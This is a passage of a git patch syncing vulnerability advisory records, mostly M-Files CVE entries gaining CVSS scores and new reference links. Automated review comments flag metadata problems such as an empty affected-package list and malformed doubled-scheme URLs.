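Review bot: `"affected": []` is empty in the new GHSA-q5xx-fxv3-xxqf record even though `details` names datapizza-ai 0.0.2, so tooling that matches advisories by package and version range will not surface this entry. Until a reviewed record carries a package and range, exposure has to be checked by hand wherever untrusted prompt text reaches `ChatPromptTemplate`. The `cwe_ids` value `"CWE-791"` is broader than the wording in `details`, which matches the title of CWE-1336 (improper neutralization of special elements used in a template engine); the more specific ID would probably classify this better, assuming the upstream source agrees. The reference list includes a `#poc` link and the CVSS v4 vector carries `E:P`, which is a reason to triage this entry ahead of GitHub's review rather than after it.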
diff --git a/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json index 940a4d6d2b01d..2066752adde8c 100644 --- a/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json +++ b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w94g-pmcx-r454", - "modified": "2026-02-18T18:30:39Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:39Z", "aliases": [ "CVE-2025-71229" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71229" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0177aa828d966117ea30a44f2e1890fdb356118e" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/13394550441557115bb74f6de9778c165755a7ab" From a1043d8fc44ceb8bf9188e61d53ec0b0a373003d Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 09:33:10 +0000 Subject: [PATCH 51/77] Advisory Database Sync --- .../GHSA-5c8j-7c6c-838x.json | 13 ++++- .../GHSA-h62q-wxxr-4qqj.json | 13 ++++- .../GHSA-wrw2-8vg5-g3jj.json | 13 ++++- .../GHSA-6w8q-wgfc-hxx8.json | 6 +- .../GHSA-hx75-3jr9-944m.json | 6 +- .../GHSA-cmrr-4p45-4xv3.json | 6 +- .../GHSA-fh2m-jrq8-h6q5.json | 6 +- .../GHSA-j86w-j9vr-w3pm.json | 6 +- .../GHSA-qx2w-wx28-8mhv.json | 6 +- .../GHSA-f75p-j579-8r2c.json | 6 +- .../GHSA-j6v8-rcm6-wxr2.json | 6 +- .../GHSA-r92f-q253-q9wv.json | 6 +- .../GHSA-24q2-4vqq-qcx6.json | 6 +- .../GHSA-752c-24px-69m9.json | 8 ++- .../GHSA-mq99-fg37-h9r3.json | 8 ++- .../GHSA-xgf2-5w76-r5jg.json | 6 +- .../GHSA-g4w4-pwm7-7rv4.json | 6 +- .../GHSA-94c6-66pj-36g9.json | 6 +- .../GHSA-fx24-f32v-56xf.json | 6 +- .../GHSA-g25q-jw4h-pppq.json | 6 +- .../GHSA-566r-vx98-9rr7.json | 8 ++- .../GHSA-94xm-wg2w-cvfq.json | 8 ++- .../GHSA-r2vj-428g-v68v.json | 8 ++- .../GHSA-cccf-mjv6-phwq.json | 6 +- .../GHSA-v3xm-8fcm-8j8q.json | 8 ++- .../GHSA-xjc5-m98p-6f2c.json | 8 ++- .../GHSA-4mcp-5qpc-wgf8.json | 6 +- .../GHSA-r32c-fmcr-34r3.json | 6 +- .../GHSA-25w3-vxr6-gm5r.json | 6 +- .../GHSA-27fq-8xxm-gqgw.json | 18 +++++- .../GHSA-29jx-3q54-p8gq.json | 18 +++++- .../GHSA-2gmr-vqp5-r9qg.json | 6 +- .../GHSA-2m9v-rwcf-g57m.json | 10 +++- .../GHSA-2qfg-m3c3-m867.json | 6 +- .../GHSA-359g-wg43-pfv8.json | 6 +- .../GHSA-3vj5-3fjj-88m8.json | 6 +- .../GHSA-4696-58w6-rqw4.json | 6 +- .../GHSA-4mf2-6634-xrph.json | 10 +++- .../GHSA-4p7v-9jxw-m3mp.json | 6 +- .../GHSA-5j8r-5f3r-4w9p.json | 6 +- .../GHSA-67vh-536w-6pc4.json | 6 +- .../GHSA-6cvf-4x5f-rv59.json | 6 +- .../GHSA-6fpp-9pqw-wr8m.json | 6 +- .../GHSA-6q3r-7qmf-2jrm.json | 6 +- .../GHSA-74rr-mvxh-jvg7.json | 6 +- .../GHSA-79xr-h873-2v98.json | 6 +- .../GHSA-7x8v-q8wp-hcg7.json | 6 +- .../GHSA-8gqc-w5g5-j344.json | 6 +- .../GHSA-8whh-2x7g-j9cx.json | 6 +- 
.../GHSA-9438-qf7w-49rg.json | 6 +- .../GHSA-9g9c-c6jm-98g4.json | 6 +- .../GHSA-c99x-xcf4-fhgm.json | 6 +- .../GHSA-c9rh-2qq3-frxv.json | 6 +- .../GHSA-f679-6xgj-qqcg.json | 6 +- .../GHSA-fgq8-gvxr-ghw7.json | 6 +- .../GHSA-fprw-935f-f6f7.json | 6 +- .../GHSA-g5rv-h647-hjj3.json | 6 +- .../GHSA-gq8r-4rr6-wr2q.json | 6 +- .../GHSA-grwh-fmhg-rqcq.json | 6 +- .../GHSA-h4jj-hgv3-ppwg.json | 2 +- .../GHSA-hqj6-7698-rxx4.json | 6 +- .../GHSA-j6q4-mvcw-hpgm.json | 6 +- .../GHSA-jqv9-g2ph-pfw9.json | 6 +- .../GHSA-jvvr-947r-5jcr.json | 6 +- .../GHSA-m43m-9cwc-jq98.json | 6 +- .../GHSA-m9r7-9m8m-9f64.json | 6 +- .../GHSA-mf3r-3jp8-f7f5.json | 6 +- .../GHSA-mp27-9vf3-rfc6.json | 6 +- .../GHSA-mw2p-3c2q-3gxg.json | 10 +++- .../GHSA-q4m9-3fr6-f83p.json | 6 +- .../GHSA-q4xv-cr27-98cp.json | 6 +- .../GHSA-q9fv-9fr9-69p3.json | 6 +- .../GHSA-qvgm-c3f9-m43m.json | 6 +- .../GHSA-r58r-mmgc-mr7f.json | 6 +- .../GHSA-rcpp-qhfh-r47v.json | 6 +- .../GHSA-rf69-3jvx-93qp.json | 6 +- .../GHSA-vrx4-99h7-rgjh.json | 2 +- .../GHSA-x3rh-6rvx-g8m2.json | 6 +- .../GHSA-xc7m-2p37-4qw2.json | 6 +- .../GHSA-xvvx-g2mg-wqw5.json | 6 +- .../GHSA-429q-mrc4-38fr.json | 35 ++++++++++++ .../GHSA-7jmh-rhmc-g5gq.json | 36 ++++++++++++ .../GHSA-9vfc-93vc-6ffp.json | 56 +++++++++++++++++++ .../GHSA-c3f3-cc42-xr9v.json | 35 ++++++++++++ .../GHSA-fhhg-8jv8-7rcw.json | 36 ++++++++++++ .../GHSA-h4v7-f6v2-4hmm.json | 52 +++++++++++++++++ .../GHSA-m5p7-pf66-25qw.json | 56 +++++++++++++++++++ .../GHSA-m879-6gvr-239v.json | 52 +++++++++++++++++ .../GHSA-p2cq-gh8c-83cc.json | 52 +++++++++++++++++ .../GHSA-qmq9-8xrr-rx63.json | 52 +++++++++++++++++ .../GHSA-rgpr-47mq-rh3c.json | 52 +++++++++++++++++ 91 files changed, 967 insertions(+), 90 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7jmh-rhmc-g5gq/GHSA-7jmh-rhmc-g5gq.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-9vfc-93vc-6ffp/GHSA-9vfc-93vc-6ffp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fhhg-8jv8-7rcw/GHSA-fhhg-8jv8-7rcw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h4v7-f6v2-4hmm/GHSA-h4v7-f6v2-4hmm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m5p7-pf66-25qw/GHSA-m5p7-pf66-25qw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m879-6gvr-239v/GHSA-m879-6gvr-239v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p2cq-gh8c-83cc/GHSA-p2cq-gh8c-83cc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qmq9-8xrr-rx63/GHSA-qmq9-8xrr-rx63.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rgpr-47mq-rh3c/GHSA-rgpr-47mq-rh3c.json diff --git a/advisories/unreviewed/2022/01/GHSA-5c8j-7c6c-838x/GHSA-5c8j-7c6c-838x.json b/advisories/unreviewed/2022/01/GHSA-5c8j-7c6c-838x/GHSA-5c8j-7c6c-838x.json index c3c569aea530d..41ac046000665 100644 --- a/advisories/unreviewed/2022/01/GHSA-5c8j-7c6c-838x/GHSA-5c8j-7c6c-838x.json +++ b/advisories/unreviewed/2022/01/GHSA-5c8j-7c6c-838x/GHSA-5c8j-7c6c-838x.json 
@@ -1,19 +1,28 @@ { "schema_version": "1.4.0", "id": "GHSA-5c8j-7c6c-838x", - "modified": "2022-01-27T00:04:03Z", + "modified": "2026-02-23T09:31:16Z", "published": "2022-01-19T00:01:07Z", "aliases": [ "CVE-2021-41807" ], "details": "Lack of rate limiting in M-Files Server and M-Files Web products with versions before 21.12.10873.0 in certain type of user accounts allows unlimited amount of attempts and therefore makes brute-forcing login accounts easier.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41807" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2021-41807" + }, { "type": "WEB", "url": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41807" diff --git a/advisories/unreviewed/2022/01/GHSA-h62q-wxxr-4qqj/GHSA-h62q-wxxr-4qqj.json b/advisories/unreviewed/2022/01/GHSA-h62q-wxxr-4qqj/GHSA-h62q-wxxr-4qqj.json index c066733e89b9b..e4073ccceb8f4 100644 --- a/advisories/unreviewed/2022/01/GHSA-h62q-wxxr-4qqj/GHSA-h62q-wxxr-4qqj.json +++ b/advisories/unreviewed/2022/01/GHSA-h62q-wxxr-4qqj/GHSA-h62q-wxxr-4qqj.json 
@@ -1,19 +1,28 @@ { "schema_version": "1.4.0", "id": "GHSA-h62q-wxxr-4qqj", - "modified": "2022-01-27T00:04:01Z", + "modified": "2026-02-23T09:31:16Z", "published": "2022-01-19T00:01:07Z", "aliases": [ "CVE-2021-41808" ], "details": "In M-Files Server product with versions before 21.11.10775.0, enabling logging of Federated authentication to event log wrote sensitive information to log. Mitigating factors are logging is disabled by default.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41808" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2021-41808" + }, { "type": "WEB", "url": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41808" diff --git a/advisories/unreviewed/2022/01/GHSA-wrw2-8vg5-g3jj/GHSA-wrw2-8vg5-g3jj.json b/advisories/unreviewed/2022/01/GHSA-wrw2-8vg5-g3jj/GHSA-wrw2-8vg5-g3jj.json index 6e542ef50835d..7949473715e52 100644 --- a/advisories/unreviewed/2022/01/GHSA-wrw2-8vg5-g3jj/GHSA-wrw2-8vg5-g3jj.json +++ b/advisories/unreviewed/2022/01/GHSA-wrw2-8vg5-g3jj/GHSA-wrw2-8vg5-g3jj.json 
@@ -1,19 +1,28 @@ { "schema_version": "1.4.0", "id": "GHSA-wrw2-8vg5-g3jj", - "modified": "2022-01-27T00:04:00Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-01-19T00:01:07Z", "aliases": [ "CVE-2021-41809" ], "details": "SSRF vulnerability in M-Files Server products with versions before 22.1.11017.1, in a preview function allowed making queries from the server with certain document types referencing external entities.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41809" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2021-41809" + }, { "type": "WEB", "url": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41809" diff --git a/advisories/unreviewed/2022/11/GHSA-6w8q-wgfc-hxx8/GHSA-6w8q-wgfc-hxx8.json b/advisories/unreviewed/2022/11/GHSA-6w8q-wgfc-hxx8/GHSA-6w8q-wgfc-hxx8.json index 9def7007ef0c2..1fd518f8196d9 100644 --- a/advisories/unreviewed/2022/11/GHSA-6w8q-wgfc-hxx8/GHSA-6w8q-wgfc-hxx8.json +++ b/advisories/unreviewed/2022/11/GHSA-6w8q-wgfc-hxx8/GHSA-6w8q-wgfc-hxx8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6w8q-wgfc-hxx8", - "modified": "2024-08-28T12:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-11-30T15:30:27Z", "aliases": [ "CVE-2022-1606" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1606" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-1606" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-1606" diff --git a/advisories/unreviewed/2022/11/GHSA-hx75-3jr9-944m/GHSA-hx75-3jr9-944m.json b/advisories/unreviewed/2022/11/GHSA-hx75-3jr9-944m/GHSA-hx75-3jr9-944m.json index 93306ce0e00be..3d4d269484d1e 100644 
--- a/advisories/unreviewed/2022/11/GHSA-hx75-3jr9-944m/GHSA-hx75-3jr9-944m.json +++ b/advisories/unreviewed/2022/11/GHSA-hx75-3jr9-944m/GHSA-hx75-3jr9-944m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hx75-3jr9-944m", - "modified": "2024-08-28T12:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-11-30T15:30:27Z", "aliases": [ "CVE-2022-1911" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1911" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-1911" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-1911" diff --git a/advisories/unreviewed/2022/12/GHSA-cmrr-4p45-4xv3/GHSA-cmrr-4p45-4xv3.json b/advisories/unreviewed/2022/12/GHSA-cmrr-4p45-4xv3/GHSA-cmrr-4p45-4xv3.json index aa181276c0dfa..f950eeefbbf9c 100644 --- a/advisories/unreviewed/2022/12/GHSA-cmrr-4p45-4xv3/GHSA-cmrr-4p45-4xv3.json +++ b/advisories/unreviewed/2022/12/GHSA-cmrr-4p45-4xv3/GHSA-cmrr-4p45-4xv3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cmrr-4p45-4xv3", - "modified": "2024-08-28T12:30:33Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-12-30T12:30:25Z", "aliases": [ "CVE-2022-4858" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4858" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4858" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4858" diff --git a/advisories/unreviewed/2022/12/GHSA-fh2m-jrq8-h6q5/GHSA-fh2m-jrq8-h6q5.json b/advisories/unreviewed/2022/12/GHSA-fh2m-jrq8-h6q5/GHSA-fh2m-jrq8-h6q5.json index 8876e166129f3..0ecedd0c3eb4d 100644 --- a/advisories/unreviewed/2022/12/GHSA-fh2m-jrq8-h6q5/GHSA-fh2m-jrq8-h6q5.json +++ b/advisories/unreviewed/2022/12/GHSA-fh2m-jrq8-h6q5/GHSA-fh2m-jrq8-h6q5.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fh2m-jrq8-h6q5", - "modified": "2024-08-28T12:30:32Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-12-02T15:30:26Z", "aliases": [ "CVE-2022-4270" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4270" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4270" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4270" diff --git a/advisories/unreviewed/2022/12/GHSA-j86w-j9vr-w3pm/GHSA-j86w-j9vr-w3pm.json b/advisories/unreviewed/2022/12/GHSA-j86w-j9vr-w3pm/GHSA-j86w-j9vr-w3pm.json index 06df8ceceaeb9..83304ebccd5b7 100644 --- a/advisories/unreviewed/2022/12/GHSA-j86w-j9vr-w3pm/GHSA-j86w-j9vr-w3pm.json +++ b/advisories/unreviewed/2022/12/GHSA-j86w-j9vr-w3pm/GHSA-j86w-j9vr-w3pm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j86w-j9vr-w3pm", - "modified": "2024-08-28T12:30:32Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-12-09T15:30:29Z", "aliases": [ "CVE-2022-4264" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4264" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4264" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4264" diff --git a/advisories/unreviewed/2022/12/GHSA-qx2w-wx28-8mhv/GHSA-qx2w-wx28-8mhv.json b/advisories/unreviewed/2022/12/GHSA-qx2w-wx28-8mhv/GHSA-qx2w-wx28-8mhv.json index fcc5f97556b5f..5afc2cfae1efd 100644 --- a/advisories/unreviewed/2022/12/GHSA-qx2w-wx28-8mhv/GHSA-qx2w-wx28-8mhv.json +++ b/advisories/unreviewed/2022/12/GHSA-qx2w-wx28-8mhv/GHSA-qx2w-wx28-8mhv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qx2w-wx28-8mhv", - "modified": "2024-08-28T12:30:33Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-12-30T15:30:22Z", "aliases": [ "CVE-2022-4861" 
@@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4861" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4861" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4861" diff --git a/advisories/unreviewed/2023/03/GHSA-f75p-j579-8r2c/GHSA-f75p-j579-8r2c.json b/advisories/unreviewed/2023/03/GHSA-f75p-j579-8r2c/GHSA-f75p-j579-8r2c.json index 341010b38f95e..e479da9829027 100644 --- a/advisories/unreviewed/2023/03/GHSA-f75p-j579-8r2c/GHSA-f75p-j579-8r2c.json +++ b/advisories/unreviewed/2023/03/GHSA-f75p-j579-8r2c/GHSA-f75p-j579-8r2c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f75p-j579-8r2c", - "modified": "2024-08-28T09:30:30Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-03-29T12:30:35Z", "aliases": [ "CVE-2023-0213" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0213" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-0213" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-0213" diff --git a/advisories/unreviewed/2023/03/GHSA-j6v8-rcm6-wxr2/GHSA-j6v8-rcm6-wxr2.json b/advisories/unreviewed/2023/03/GHSA-j6v8-rcm6-wxr2/GHSA-j6v8-rcm6-wxr2.json index 0a15fd9c4a331..64d0aa9989a84 100644 --- a/advisories/unreviewed/2023/03/GHSA-j6v8-rcm6-wxr2/GHSA-j6v8-rcm6-wxr2.json +++ b/advisories/unreviewed/2023/03/GHSA-j6v8-rcm6-wxr2/GHSA-j6v8-rcm6-wxr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6v8-rcm6-wxr2", - "modified": "2024-08-28T12:30:33Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-03-06T12:30:15Z", "aliases": [ "CVE-2022-4862" 
@@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4862" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4862" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4862" diff --git a/advisories/unreviewed/2023/03/GHSA-r92f-q253-q9wv/GHSA-r92f-q253-q9wv.json b/advisories/unreviewed/2023/03/GHSA-r92f-q253-q9wv/GHSA-r92f-q253-q9wv.json index 81576a2b95ae3..12f3d62d1f391 100644 --- a/advisories/unreviewed/2023/03/GHSA-r92f-q253-q9wv/GHSA-r92f-q253-q9wv.json +++ b/advisories/unreviewed/2023/03/GHSA-r92f-q253-q9wv/GHSA-r92f-q253-q9wv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r92f-q253-q9wv", - "modified": "2024-08-28T12:30:33Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-03-06T12:30:16Z", "aliases": [ "CVE-2022-3284" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3284" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-3284" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-3284" diff --git a/advisories/unreviewed/2023/04/GHSA-24q2-4vqq-qcx6/GHSA-24q2-4vqq-qcx6.json b/advisories/unreviewed/2023/04/GHSA-24q2-4vqq-qcx6/GHSA-24q2-4vqq-qcx6.json index c5d381655c6d4..e02c4f5ff7698 100644 --- a/advisories/unreviewed/2023/04/GHSA-24q2-4vqq-qcx6/GHSA-24q2-4vqq-qcx6.json +++ b/advisories/unreviewed/2023/04/GHSA-24q2-4vqq-qcx6/GHSA-24q2-4vqq-qcx6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-24q2-4vqq-qcx6", - "modified": "2024-08-28T09:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-04-05T09:30:18Z", "aliases": [ "CVE-2023-0382" 
@@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0382" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-0382" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-0382" diff --git a/advisories/unreviewed/2023/04/GHSA-752c-24px-69m9/GHSA-752c-24px-69m9.json b/advisories/unreviewed/2023/04/GHSA-752c-24px-69m9/GHSA-752c-24px-69m9.json index 3b298312f97ae..8038689fd87b1 100644 --- a/advisories/unreviewed/2023/04/GHSA-752c-24px-69m9/GHSA-752c-24px-69m9.json +++ b/advisories/unreviewed/2023/04/GHSA-752c-24px-69m9/GHSA-752c-24px-69m9.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-752c-24px-69m9", - "modified": "2024-08-28T09:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-04-20T09:30:17Z", "aliases": [ "CVE-2023-0384" ], - "details": "\nUser-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1\n\n due to uncontrolled memory consumption for a scheduled job.\n\n\n\n", + "details": "User-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1\n\n due to uncontrolled memory consumption for a scheduled job.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0384" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-0384" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-0384" diff --git a/advisories/unreviewed/2023/04/GHSA-mq99-fg37-h9r3/GHSA-mq99-fg37-h9r3.json b/advisories/unreviewed/2023/04/GHSA-mq99-fg37-h9r3/GHSA-mq99-fg37-h9r3.json index 091544649ca32..449315246b107 100644 --- a/advisories/unreviewed/2023/04/GHSA-mq99-fg37-h9r3/GHSA-mq99-fg37-h9r3.json +++ b/advisories/unreviewed/2023/04/GHSA-mq99-fg37-h9r3/GHSA-mq99-fg37-h9r3.json 
@@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-mq99-fg37-h9r3", - "modified": "2024-08-28T09:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-04-20T09:30:17Z", "aliases": [ "CVE-2023-0383" ], - "details": "\nUser-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1\n\n due to uncontrolled memory consumption.\n\n\n\n", + "details": "User-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1\n\n due to uncontrolled memory consumption.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0383" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-0383" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-0383" diff --git a/advisories/unreviewed/2023/05/GHSA-xgf2-5w76-r5jg/GHSA-xgf2-5w76-r5jg.json b/advisories/unreviewed/2023/05/GHSA-xgf2-5w76-r5jg/GHSA-xgf2-5w76-r5jg.json index 2df8c13b6ebc2..2651e8496021a 100644 --- a/advisories/unreviewed/2023/05/GHSA-xgf2-5w76-r5jg/GHSA-xgf2-5w76-r5jg.json +++ b/advisories/unreviewed/2023/05/GHSA-xgf2-5w76-r5jg/GHSA-xgf2-5w76-r5jg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xgf2-5w76-r5jg", - "modified": "2024-08-28T09:30:32Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-05-25T15:30:17Z", "aliases": [ "CVE-2023-2480" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2480" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-2480" + }, { "type": "WEB", "url": "https://https://www.m-files.com/about/trust-center/security-advisories/cve-2023-2480" diff --git a/advisories/unreviewed/2023/06/GHSA-g4w4-pwm7-7rv4/GHSA-g4w4-pwm7-7rv4.json b/advisories/unreviewed/2023/06/GHSA-g4w4-pwm7-7rv4/GHSA-g4w4-pwm7-7rv4.json index 81091df2426ce..0048649df753f 100644 
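Review bot: The retained reference in the GHSA-xgf2-5w76-r5jg hunk, `"url": "https://https://www.m-files.com/about/trust-center/security-advisories/cve-2023-2480"`, has a doubled scheme and will not resolve as written. The same malformed prefix appears in the GHSA-v3xm-8fcm-8j8q hunk for cve-2023-6189. This sync adds the `empower.m-files.com` link next to each but leaves the broken entries in place. They were presumably meant to read `"url": "https://www.m-files.com/about/trust-center/security-advisories/cve-2023-2480"` (and likewise for cve-2023-6189), and the fix probably belongs in the upstream source record so that later syncs do not reintroduce it.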
--- a/advisories/unreviewed/2023/06/GHSA-g4w4-pwm7-7rv4/GHSA-g4w4-pwm7-7rv4.json +++ b/advisories/unreviewed/2023/06/GHSA-g4w4-pwm7-7rv4/GHSA-g4w4-pwm7-7rv4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4w4-pwm7-7rv4", - "modified": "2024-08-28T09:30:32Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-06-27T15:30:28Z", "aliases": [ "CVE-2023-3405" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3405" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-3405" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-3405" diff --git a/advisories/unreviewed/2023/07/GHSA-94c6-66pj-36g9/GHSA-94c6-66pj-36g9.json b/advisories/unreviewed/2023/07/GHSA-94c6-66pj-36g9/GHSA-94c6-66pj-36g9.json index 68313833d90ac..e8ea0a39d95f2 100644 --- a/advisories/unreviewed/2023/07/GHSA-94c6-66pj-36g9/GHSA-94c6-66pj-36g9.json +++ b/advisories/unreviewed/2023/07/GHSA-94c6-66pj-36g9/GHSA-94c6-66pj-36g9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-94c6-66pj-36g9", - "modified": "2024-08-28T09:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-07-06T19:24:16Z", "aliases": [ "CVE-2023-2112" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2112" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-2112" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-2112" diff --git a/advisories/unreviewed/2023/08/GHSA-fx24-f32v-56xf/GHSA-fx24-f32v-56xf.json 